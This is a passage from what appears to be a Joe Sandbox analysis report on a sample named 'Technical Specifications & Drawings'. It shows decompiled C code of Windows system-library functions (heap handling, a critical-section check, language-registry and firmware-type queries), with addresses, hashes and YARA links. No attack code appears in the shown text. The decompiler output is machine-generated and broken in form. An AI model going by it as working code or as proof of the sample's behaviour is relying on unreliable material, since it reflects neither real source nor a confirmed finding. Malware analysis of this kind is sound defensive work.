							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                  0x017ae620
                                                  0x017ae628
                                                  0x017ae62f
                                                  0x017ae631
                                                  0x017ae635
                                                  0x017ae637
                                                  0x017ae63e
                                                  0x01805503
                                                  0x01805503
                                                  0x017ae64c
                                                  0x017ae64c
                                                  0x017ae651
                                                  0x00000000
                                                  0x00000000
                                                  0x017ae661
                                                  0x017ae665
                                                  0x0180542a
                                                  0x017ae715
                                                  0x017ae71a
                                                  0x017ae71c
                                                  0x017ae720
                                                  0x017ae720
                                                  0x017ae727
                                                  0x017ae736
                                                  0x017ae736
                                                  0x017ae743
                                                  0x017ae743
                                                  0x017ae673
                                                  0x017ae678
                                                  0x017ae67d
                                                  0x017ae682
                                                  0x017ae685
                                                  0x017ae692
                                                  0x017ae69b
                                                  0x017ae6a3
                                                  0x017ae6ad
                                                  0x017ae6b1
                                                  0x017ae6b2
                                                  0x017ae6bb
                                                  0x017ae6bf
                                                  0x017ae6c0
                                                  0x017ae6c8
                                                  0x017ae6cc
                                                  0x017ae6d5
                                                  0x017ae6d9
                                                  0x00000000
                                                  0x00000000
                                                  0x017ae6e5
                                                  0x017ae6ea
                                                  0x017ae6f9
                                                  0x017ae70b
                                                  0x017ae70f
                                                  0x01805439
                                                  0x0180545e
                                                  0x0180545e
                                                  0x00000000
                                                  0x0180545e
                                                  0x0180543b
                                                  0x0180543e
                                                  0x01805440
                                                  0x01805445
                                                  0x01805472
                                                  0x01805475
                                                  0x0180548d
                                                  0x01805493
                                                  0x018054a9
                                                  0x00000000
                                                  0x00000000
                                                  0x018054ab
                                                  0x018054b4
                                                  0x018054bc
                                                  0x018054c8
                                                  0x018054de
                                                  0x018054fb
                                                  0x018054e0
                                                  0x018054e6
                                                  0x018054eb
                                                  0x018054eb
                                                  0x018054de
                                                  0x00000000
                                                  0x018054bc
                                                  0x01805477
                                                  0x0180547a
                                                  0x01805480
                                                  0x01805483
                                                  0x01805486
                                                  0x0180548b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0180548b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01805447
                                                  0x01805447
                                                  0x01805447
                                                  0x01805447
                                                  0x0180544e
                                                  0x00000000
                                                  0x00000000
                                                  0x01805450
                                                  0x01805452
                                                  0x01805455
                                                  0x0180545a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0180545c
                                                  0x0180546a
                                                  0x0180546d
                                                  0x0180546f
                                                  0x00000000
                                                  0x0180546f
                                                  0x017ae70f

                                                  Strings
                                                  • InstallLanguageFallback, xrefs: 017AE6DB
                                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 017AE68C
                                                  • @, xrefs: 017AE6C0
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                  • API String ID: 0-1757540487
                                                  • Opcode ID: 9b9e924d7caf41ef72e965165a84f78ac2a12af0541c80530d594a70e72c0d2d
                                                  • Instruction ID: 2a36cd8cc6b2792d7f1ef65a31f5f5a25b610ead4f1788c675461987b3c87494
                                                  • Opcode Fuzzy Hash: 9b9e924d7caf41ef72e965165a84f78ac2a12af0541c80530d594a70e72c0d2d
                                                  • Instruction Fuzzy Hash: 8D51A6B15043469BD715DF24C884AABF7E8BF88714F45096EF985D7250FB34DA04CBA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CB8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E017CB8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x1898748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E017AB150();
						} else {
							E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E017AB150();
						__eflags =  *0x1897bc8;
						if(__eflags == 0) {
							E01862073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E017CAB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                                                  0x017cb8f0
                                                  0x017cb8f2
                                                  0x017cb8f4
                                                  0x01812c4e
                                                  0x01812c50
                                                  0x01812c56
                                                  0x01812c5c
                                                  0x01812c60
                                                  0x01812c7f
                                                  0x01812c84
                                                  0x01812c62
                                                  0x01812c77
                                                  0x01812c7c
                                                  0x01812c8a
                                                  0x01812c8f
                                                  0x01812c94
                                                  0x01812c9c
                                                  0x01812ca5
                                                  0x01812ca5
                                                  0x01812c9c
                                                  0x01812c50
                                                  0x017cb8fa
                                                  0x017cb902
                                                  0x017cb921
                                                  0x017cb921
                                                  0x017cb924
                                                  0x017cb924
                                                  0x017cb927
                                                  0x00000000
                                                  0x00000000
                                                  0x017cb929
                                                  0x017cb92b
                                                  0x017cb92d
                                                  0x017cb940
                                                  0x00000000
                                                  0x017cb940
                                                  0x017cb932
                                                  0x017cb932
                                                  0x00000000
                                                  0x017cb932
                                                  0x00000000
                                                  0x017cb904
                                                  0x017cb904
                                                  0x017cb90a
                                                  0x017cb90c
                                                  0x017cb916
                                                  0x017cb919
                                                  0x017cb915
                                                  0x017cb915
                                                  0x017cb91b
                                                  0x017cb91b
                                                  0x00000000
                                                  0x017cb910

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-2558761708
                                                  • Opcode ID: 92b83d815111fae050483f3b4fe218e0bc665fdc0707ad7029544eb3adfa7a4b
                                                  • Instruction ID: d77df0fc054759d4db1ba0a25d6c69d8c00f5f5f753f3769061494b4251d24e1
                                                  • Opcode Fuzzy Hash: 92b83d815111fae050483f3b4fe218e0bc665fdc0707ad7029544eb3adfa7a4b
                                                  • Instruction Fuzzy Hash: BE11D031344102DFDB29DB1DC496B76F7A6EB90BA0F28816DF10ACB245D634E944CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0183FF10 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0183FF60
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                  • API String ID: 3446177414-1911121157
                                                  • Opcode ID: 0915710a419bb21aae7d5aaa99b1567242af5ef8843c06bb3283ddba8ea9f9ca
                                                  • Instruction ID: 2ad6df9e4f6cf59a6a0a3bbb5f48893083052b9e0a53c43547440bd4bef61a54
                                                  • Opcode Fuzzy Hash: 0915710a419bb21aae7d5aaa99b1567242af5ef8843c06bb3283ddba8ea9f9ca
                                                  • Instruction Fuzzy Hash: 74110071910544EFDF22EB54C848F98BBB1FF48704F188058E609AB2A1CB389B44DBD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0186E539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E0186E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0186BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0186BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0186AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E017E9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0186A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0186A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E017E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0186A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0186A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E017C2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E017BB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E017BFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E017C7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0185FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                  0x0186e547
                                                  0x0186e549
                                                  0x0186e54f
                                                  0x0186e553
                                                  0x0186e557
                                                  0x0186e55a
                                                  0x0186e55c
                                                  0x0186e55f
                                                  0x0186e561
                                                  0x0186e567
                                                  0x0186e56b
                                                  0x0186e7e2
                                                  0x00000000
                                                  0x0186e571
                                                  0x0186e575
                                                  0x0186e577
                                                  0x0186e57b
                                                  0x0186e57c
                                                  0x0186e57d
                                                  0x0186e57e
                                                  0x0186e57f
                                                  0x0186e588
                                                  0x0186e58f
                                                  0x0186e591
                                                  0x0186e592
                                                  0x0186e592
                                                  0x0186e596
                                                  0x0186e59e
                                                  0x0186e5a0
                                                  0x0186e5a6
                                                  0x0186e61d
                                                  0x0186e61d
                                                  0x0186e621
                                                  0x0186e623
                                                  0x0186e630
                                                  0x0186e630
                                                  0x0186e7e6
                                                  0x0186e7eb
                                                  0x0186e7ed
                                                  0x0186e7f4
                                                  0x0186e7fa
                                                  0x0186e7ff
                                                  0x0186e7ff
                                                  0x0186e80a
                                                  0x0186e812
                                                  0x0186e812
                                                  0x0186e5ab
                                                  0x0186e5b4
                                                  0x0186e5b9
                                                  0x0186e5be
                                                  0x0186e5c0
                                                  0x0186e5c2
                                                  0x0186e5c8
                                                  0x0186e5c9
                                                  0x0186e5cb
                                                  0x0186e5cc
                                                  0x0186e5d5
                                                  0x0186e5e4
                                                  0x0186e5f1
                                                  0x0186e5f8
                                                  0x0186e5f8
                                                  0x0186e5d5
                                                  0x0186e602
                                                  0x0186e616
                                                  0x0186e63d
                                                  0x0186e644
                                                  0x0186e64d
                                                  0x0186e652
                                                  0x0186e657
                                                  0x0186e659
                                                  0x0186e65b
                                                  0x0186e661
                                                  0x0186e662
                                                  0x0186e664
                                                  0x0186e665
                                                  0x0186e66e
                                                  0x0186e67d
                                                  0x0186e68a
                                                  0x0186e691
                                                  0x0186e691
                                                  0x0186e66e
                                                  0x0186e6b0
                                                  0x00000000
                                                  0x0186e6b6
                                                  0x0186e6bd
                                                  0x0186e6c7
                                                  0x0186e6d7
                                                  0x0186e6d9
                                                  0x0186e6db
                                                  0x0186e6de
                                                  0x0186e6e3
                                                  0x0186e6f3
                                                  0x0186e6fc
                                                  0x0186e700
                                                  0x0186e700
                                                  0x0186e704
                                                  0x0186e70a
                                                  0x0186e70a
                                                  0x0186e713
                                                  0x0186e716
                                                  0x0186e719
                                                  0x0186e720
                                                  0x0186e761
                                                  0x0186e76b
                                                  0x0186e774
                                                  0x0186e77a
                                                  0x0186e77a
                                                  0x0186e78a
                                                  0x0186e791
                                                  0x0186e799
                                                  0x0186e79b
                                                  0x0186e79f
                                                  0x0186e7aa
                                                  0x0186e7c0
                                                  0x0186e7ac
                                                  0x0186e7b2
                                                  0x0186e7b9
                                                  0x0186e7b9
                                                  0x0186e7c7
                                                  0x0186e806
                                                  0x00000000
                                                  0x0186e7c9
                                                  0x0186e7d1
                                                  0x0186e7d8
                                                  0x00000000
                                                  0x0186e7d8
                                                  0x00000000
                                                  0x00000000
                                                  0x0186e722
                                                  0x0186e72e
                                                  0x0186e748
                                                  0x0186e74c
                                                  0x0186e754
                                                  0x0186e756
                                                  0x0186e75c
                                                  0x0186e75c
                                                  0x00000000
                                                  0x0186e75c
                                                  0x0186e758
                                                  0x0186e758
                                                  0x00000000
                                                  0x0186e758
                                                  0x0186e750
                                                  0x00000000
                                                  0x00000000
                                                  0x0186e752
                                                  0x00000000
                                                  0x0186e752
                                                  0x0186e730
                                                  0x0186e735
                                                  0x0186e73d
                                                  0x0186e73f
                                                  0x00000000
                                                  0x00000000
                                                  0x0186e741
                                                  0x0186e741
                                                  0x00000000
                                                  0x0186e741
                                                  0x0186e739
                                                  0x00000000
                                                  0x00000000
                                                  0x0186e73b
                                                  0x00000000
                                                  0x0186e73b
                                                  0x0186e722
                                                  0x0186e720
                                                  0x0186e6b0
                                                  0x0186e618
                                                  0x00000000
                                                  0x0186e618

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `$`
                                                  • API String ID: 0-197956300
                                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                  • Instruction ID: b75a7ac0a7951a91b8104795e1e21f79f81878431385b116c4126f03d84f640c
                                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                  • Instruction Fuzzy Hash: 34919F752043429FE725CE29C845B1BBBEABF84714F14892DFA95CB280E774EA04CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018251BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 77%
                                                  			E018251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x18805f0);
				E017FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E017BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E018253CA(0);
						return E017FD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E017EF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E017C3690(1, _t117, 0x1781810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E017EAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L017C4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E017EAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0182500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E017E9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                  0x018251be
                                                  0x018251c3
                                                  0x018251c8
                                                  0x018251cd
                                                  0x018251d0
                                                  0x018251d3
                                                  0x018251d8
                                                  0x018251db
                                                  0x018251de
                                                  0x018251e0
                                                  0x018251e3
                                                  0x018251e6
                                                  0x018251e8
                                                  0x01825342
                                                  0x01825351
                                                  0x01825356
                                                  0x0182535a
                                                  0x01825360
                                                  0x01825363
                                                  0x01825366
                                                  0x01825369
                                                  0x01825369
                                                  0x0182536b
                                                  0x0182536b
                                                  0x01825370
                                                  0x018253a3
                                                  0x018253a4
                                                  0x018253a6
                                                  0x018253ab
                                                  0x018253ab
                                                  0x018253ae
                                                  0x018253ae
                                                  0x018253b5
                                                  0x018253bf
                                                  0x018253bf
                                                  0x01825375
                                                  0x01825396
                                                  0x018253a0
                                                  0x018253a0
                                                  0x00000000
                                                  0x01825396
                                                  0x01825377
                                                  0x01825379
                                                  0x0182537f
                                                  0x0182538c
                                                  0x01825390
                                                  0x00000000
                                                  0x01825390
                                                  0x018251ee
                                                  0x018251f1
                                                  0x01825301
                                                  0x01825310
                                                  0x01825315
                                                  0x01825318
                                                  0x0182531b
                                                  0x01825320
                                                  0x0182532e
                                                  0x01825331
                                                  0x00000000
                                                  0x01825331
                                                  0x01825328
                                                  0x01825329
                                                  0x00000000
                                                  0x01825329
                                                  0x018251fa
                                                  0x01825235
                                                  0x01825236
                                                  0x01825239
                                                  0x0182523f
                                                  0x01825240
                                                  0x01825241
                                                  0x01825242
                                                  0x01825246
                                                  0x01825247
                                                  0x0182524e
                                                  0x01825251
                                                  0x01825267
                                                  0x01825269
                                                  0x0182526e
                                                  0x0182527d
                                                  0x0182527e
                                                  0x01825281
                                                  0x01825282
                                                  0x01825287
                                                  0x01825288
                                                  0x0182528a
                                                  0x0182528f
                                                  0x01825294
                                                  0x00000000
                                                  0x00000000
                                                  0x0182529a
                                                  0x0182529c
                                                  0x0182529e
                                                  0x0182529e
                                                  0x018252a4
                                                  0x018252b0
                                                  0x00000000
                                                  0x00000000
                                                  0x018252ba
                                                  0x018252bc
                                                  0x018252bc
                                                  0x018252d4
                                                  0x018252d9
                                                  0x018252dc
                                                  0x018252e1
                                                  0x00000000
                                                  0x00000000
                                                  0x018252e7
                                                  0x018252f4
                                                  0x00000000
                                                  0x018252f4
                                                  0x01825270
                                                  0x00000000
                                                  0x01825270
                                                  0x018251fc
                                                  0x018251fd
                                                  0x01825202
                                                  0x01825203
                                                  0x01825205
                                                  0x0182520a
                                                  0x0182520f
                                                  0x00000000
                                                  0x00000000
                                                  0x0182521b
                                                  0x01825226
                                                  0x0182522b
                                                  0x0182521d
                                                  0x0182521d
                                                  0x01825222
                                                  0x01825222
                                                  0x0182522d
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: Legacy$UEFI
                                                  • API String ID: 2994545307-634100481
                                                  • Opcode ID: cbd350152f0d8866a0624bdf571deb015cbebb345aa7a7713c572392df06f987
                                                  • Instruction ID: 008318ce3e15eef821459af737733174a08b5b851112c97771b97861ac569822
                                                  • Opcode Fuzzy Hash: cbd350152f0d8866a0624bdf571deb015cbebb345aa7a7713c572392df06f987
                                                  • Instruction Fuzzy Hash: 665190B1A807199FDB26DFA8C844BEDBBF8FF49700F14402DE649EB291D6709A40CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017BD5E0 Relevance: 1.9, APIs: 1, Instructions: 353timeCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
